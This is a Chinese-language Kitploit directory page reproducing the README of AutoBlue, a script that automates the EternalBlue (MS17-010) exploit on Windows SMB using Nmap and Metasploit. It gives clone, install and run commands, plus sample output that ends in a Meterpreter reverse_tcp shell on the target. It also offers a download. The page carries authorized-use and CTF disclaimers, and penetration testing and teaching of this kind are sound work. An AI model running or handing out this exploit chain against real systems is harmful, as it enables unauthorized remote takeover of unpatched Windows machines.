Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
autoblue — AutoBlue - 自动化的 EternalBlue(CVE-2017-0144 / MS17-010)漏洞利用工具,利用 Nmap 和 Metasploit 进行道德黑客、渗透测试和 CTF 挑战。仅限授权和教育用途使用! | Kitploit
工具/GitHubGitHub/atithkhawas/autoblue
漏洞扫描器Payload生成漏洞利用后渗透利用CTF渗透测试学习与教育红队
GitHubatithkhawas/autoblue

autoblue

AutoBlue - 自动化的 EternalBlue(CVE-2017-0144 / MS17-010)漏洞利用工具,利用 Nmap 和 Metasploit 进行道德黑客、渗透测试和 CTF 挑战。仅限授权和教育用途使用!

查看仓库
411年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

AUTOBLUE:自动化EternalBlue漏洞利用工具

AUTOBLUE 是一款自动化工具,用于利用 Windows 计算机上的 EternalBlue 漏洞(CVE-2017-0144)。该工具集成了 Nmap 的漏洞扫描能力和 Metasploit 的 msfconsole 进行漏洞利用,使用户能够自动识别易受攻击的系统并启动 EternalBlue 漏洞利用,从而获得对目标的远程访问权限。

本工具主要面向在受控、授权环境中工作的安全专业人员、渗透测试人员和道德黑客,例如 Capture The Flag(CTF)挑战、渗透测试任务或实验环境。AUTOBLUE 让用户只需输入目标 IP 地址,即可以最少的手动干预来利用 EternalBlue 漏洞。

功能

  • 自动化漏洞扫描: 使用 Nmap 扫描目标计算机上的 EternalBlue 漏洞(CVE-2017-0144)。

  • 无缝漏洞利用: 自动利用 Metasploit 的 msfconsole 启动 EternalBlue 漏洞利用。

  • 简单设置: 只需目标 IP 地址以及安装了 Nmap 和 Metasploit 的工作环境。

  • 输出报告: 生成指示漏洞利用尝试成功或失败的输出。

目录

  • 先决条件

  • 安装

  • 使用

  • 工作原理

  • 安全注意事项

  • 贡献

  • 许可证

  • 致谢

  • 免责声明

先决条件:

在使用 AUTOBLUE 之前,请确保您的计算机上已安装以下工具:

Nmap: 用于检测易受攻击计算机的网络扫描工具。

Metasploit 框架: 一个包含 EternalBlue 漏洞利用的渗透测试平台。

安装 Nmap:

  • 在 Linux(基于 Debian)上:

复制代码

root@kitploit:~
      sudo apt update

和

root@kitploit:~
      sudo apt install nmap

在 Windows 或 macOS 上,从官方网站下载 Nmap。

安装 Metasploit:

在 Linux(基于 Debian)上:

复制代码

root@kitploit:~
      sudo apt update

和

root@kitploit:~
     sudo apt install metasploit-framework
     

在 Windows 或 macOS 上,从官方网站下载 Metasploit。

安装:

要安装 AUTOBLUE,请执行以下步骤:

  • 克隆仓库:

    root@kitploit:~
      git clone https://github.com/AtithKhawas/autoblue.git
    

    以及

    root@kitploit:~
         cd autoblue
    

确保 Nmap 和 Metasploit 已正确安装为先决条件。

  • 赋予脚本可执行权限:

    root@kitploit:~
    chmod +x autoblue.sh
    

使用:

AUTOBLUE 旨在自动扫描和利用 EternalBlue 漏洞。以下是使用方法:

  • 运行工具

要使用 AUTOBLUE,请在终端中运行以下命令:

复制代码

root@kitploit:~
     ./autoblue.sh 

输出:

root@kitploit:~
     ┌──(root㉿kali)-[/home/Elliot] 
     └─# ./autoblue.sh 
     ============================================
     ********************************************
     AutoBlue    - EternalBlue Exploit Automation
     ********************************************
     ********************************************
     ------------------------Made by ATITH KHAWAS
     ============================================
     Enter Target IP Address:

它会要求输入目标 IP 地址和您的 IP 地址。

示例

root@kitploit:~
      Enter Target IP Address: Target<IP Address>
      Enter Your IP Address: Your <IP Address>

运行工具后,它将开始使用 Nmap 进行扫描:

输出-1

root@kitploit:~
 Target IP Address: ***.***.**.**
 [+] Scanning Target for MS17-010 Vulnerability...
 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
 Nmap scan report for ***.***.**.**
 Host is up (0.19s latency).

 PORT    STATE SERVICE
 445/tcp open  microsoft-ds

 Host script results:
 | smb-vuln-ms17-010: 
 |   VULNERABLE:
 |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
 |     State: VULNERABLE
 |     IDs:  CVE:CVE-2017-0143
 |     Risk factor: HIGH
 |       A critical remote code execution vulnerability exists in Microsoft SMBv1
 |        servers (ms17-010).
 |           
 |     Disclosure date: 2017-03-14
 |     References:
 |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
 |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
 |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

 Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
 [+] Target is VULNERABLE to EternalBlue!

这就是真正工作开始的地方,大大缩短了耗时的过程。如果目标易受攻击,它会自动启动 Msfconsole 并设置 RHOSTS、PAYLOAD、LHOST 和 LPORT,默认端口为 4444。

输出-2

root@kitploit:~
      [+] Launching Metasploit...
      [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
      RHOSTS => ***.***.**.**
      PAYLOAD => windows/x64/meterpreter/reverse_tcp
      LHOST => ***.***.**.**
      LPORT => 4444
      [*] Started reverse TCP handler on ***.***.**.**:4444 

然后为我们提供目标的 Meterpreter Shell。

输出-3

root@kitploit:~
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
       [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

       meterpreter > pwd
       C:\Windows\system32

工作原理:

  • Nmap 脚本扫描: 该工具首先使用 Nmap 脚本扫描(--script smb-vuln-ms17-010) 检测目标计算机是否容易受到 EternalBlue 漏洞利用的影响。它检查端口 445 是否开放,并尝试识别 SMB 漏洞。

  • Metasploit 漏洞利用: 如果发现目标计算机易受攻击,AUTOBLUE 将继续使用 Metasploit 的 msfconsole 启动 EternalBlue 漏洞利用。脚本将配置并发送必要的载荷以利用该漏洞。

  • 反弹 Shell: 如果漏洞利用成功,将打开一个反弹 Shell,以提供受害者计算机上的命令行界面。

  • 反馈: 该工具在整个过程中提供反馈,包括目标是否成功被利用,并输出任何相关信息(例如,反弹 Shell 的 IP 地址)。

安全注意事项:

  • 合法使用: 此工具仅应在 授权环境 中使用。确保您拥有明确许可来测试目标计算机,并且在您所在的司法管辖区内这样做是合法的。

  • 用户输入: 确保仅将受信任的 IP 输入到工具中,以防止误用。在不可信系统上运行此工具可能导致安全事件。

  • 载荷安全: 此工具中使用的反弹 Shell 载荷本身具有风险。请勿将攻击计算机或其侦听器暴露于不可信网络。

  • 保持依赖项更新: 确保定期更新 Nmap 和 Metasploit,以缓解这些工具中已知的安全漏洞。

贡献:

欢迎对 AUTOBLUE 项目做出贡献。如果您有任何建议、改进或错误修复,请随时复刻仓库并创建拉取请求。

许可证:

此工具是开源的,并根据 MIT 许可证分发。您可以自由地在自己的项目中使用、修改和分发该软件。但是,您必须在所有副本或软件的重要部分中包含此声明。

致谢:

  • Nmap: 提供了必要的漏洞扫描功能。

  • Metasploit: 提供了利用 EternalBlue 漏洞的框架。

  • 安全研究人员: 发现并公开披露了 EternalBlue 漏洞,这有助于全球系统的安全。

免责声明:

AUTOBLUE 是一款仅用于教育和道德用途的工具。作者对使用此工具进行的任何非法行为不承担任何责任。您有责任确保拥有对任何系统进行渗透测试的明确许可。

请自行承担使用风险。始终在安全合法的环境中进行渗透测试活动。

下载工具